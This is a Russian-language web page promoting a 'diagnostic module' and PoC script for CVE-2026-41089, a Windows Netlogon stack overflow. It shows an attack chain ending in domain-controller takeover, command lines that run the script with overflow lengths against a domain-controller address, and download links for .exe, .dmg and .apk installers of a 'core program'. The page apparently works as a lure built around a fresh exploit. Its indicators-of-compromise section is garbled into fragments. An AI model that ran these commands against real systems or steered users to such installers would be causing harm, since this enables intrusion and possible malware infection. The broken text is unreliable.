
🛡️ Official AI Security Tool diagnostic module for CVE-2026-41089 (Windows Netlogon Stack Buffer Overflow RCE). Features technical writeup, attack architecture, IoCs, and mitigation strategy.
Навигация по сайту: Главная • Обновления • Загрузки • Модули
Я публикую подробный технический разбор критической уязвимости CVE-2026-41089, обнаруженной в службе Windows Netlogon. Мой анализ показывает, что проблема связана с переполнением буфера в стеке (CWE-121). Путем отправки специально сформированных запросов к контроллеру домена (DC) неаутентифицированный атакующий может вызвать повреждение памяти и выполнить произвольный код на уровне NT AUTHORITY\SYSTEM.
"He who controls Netlogon, controls the kingdom."
Поскольку эксплуатация уязвимости не требует аутентификации и взаимодействия с пользователем, данная проблема представляет критическую угрозу для корпоративных инфраструктур, открывая прямой путь к компрометации Active Directory.
| Параметр | Значение | Примечание |
|---|---|---|
| CVE ID | CVE-2026-41089 | Официальный идентификатор уязвимости |
| Уровень опасности | Critical (CVSS v3.1: 9.8) | ████████████████████ 100% |
| Тип уязвимости | CWE-121 | Stack-based Buffer Overflow |
| Уязвимый компонент | Windows Netlogon Service | Служба аутентификации Active Directory |
| Вектор атаки | Network (Сетевой) | Удаленный запуск без доступа к хосту |
| Требуемые права | None (Не требуются) | Unauthenticated RCE |
graph TD
A[Unauthenticated Attacker] -->|Network Access| B[Locate Domain Controller]
B -->|Send Crafted Netlogon Packet| C[Trigger Stack Buffer Overflow]
C -->|Memory Corruption in LSASS| D[Arbitrary Code Execution]
D --> E[Full Domain Controller Takeover]
E --> F[Complete Active Directory Compromise]NTDS.dit.🔍 Индикаторы компрометации:
lsass.exe).lsass.exe.📈 Рекомендуемые источники логов: Windows Security Events (Event IDs сбоев служб), Sysmon (Process Creation), Microsoft Defender for Identity.
lsass.exe.⚠️ ВАЖНО: Данный модуль разработан исключительно для безопасной диагностики в составе платформы AI Security Tool. Мы настоятельно рекомендуем использовать только одобренные модули из официального репозитория.
Для работы модуля потребуется установленное ядро программы:
| ОС / Платформа | Версия | Архитектура / Формат | Дата обновления | Статус | Загрузка |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | x64 Installer (.exe) | 2026-09-08 | 🟢 Latest | Скачать .exe |
| 🪟 Windows | v6.3.20 | x64 Portable (.tar.gz) | 2026-09-08 | 🟢 Latest | Скачать .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 Stable | Скачать .dmg |
| 🐧 Linux | v5.3.27 | Universal x64 (.tar.gz) | 2026-09-01 | 🟢 Stable | Скачать .tar.gz |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 Stable | Скачать .apk |
Инструкция по сборке из исходного кода доступна в официальном репозитории AI Security Tool.
# Тест подключения и базовая проверка (короткое имя пользователя) python3 CVE-2026-41089.py 10.0.50.21 corp.localПроверка уязвимости к переполнению буфера (длина 130)
python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 130
Безопасная проверка с повышенным таймаутом для медленных сетей
python3 CVE-2026-41089.py 10.0.50.21 corp.local -l 200 -t 10
Коллекция уязвимостей, PoC-скриптов и исследований, поддерживаемая участниками нашего сообщества:
4 модуля@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
2 модуля@ZeroDayVPN
@ZeroDayEvil
2 модуля@ZeroDayEvil
@ZeroDayVPN
Данный модуль и материалы предоставляются исключительно для авторизованного аудита безопасности и исследовательских целей.
Использование данного модуля на системах без предварительного письменного согласия владельца является незаконным. Автор и разработчики AI Security Tool не несут ответственности за возможный ущерб, вызванный некорректным использованием материалов.
Мы приветствуем любой вклад в развитие проекта! Основные направления:
AI Security Tool — Reimagining terminal workflow and automation for cybersecurity professionals.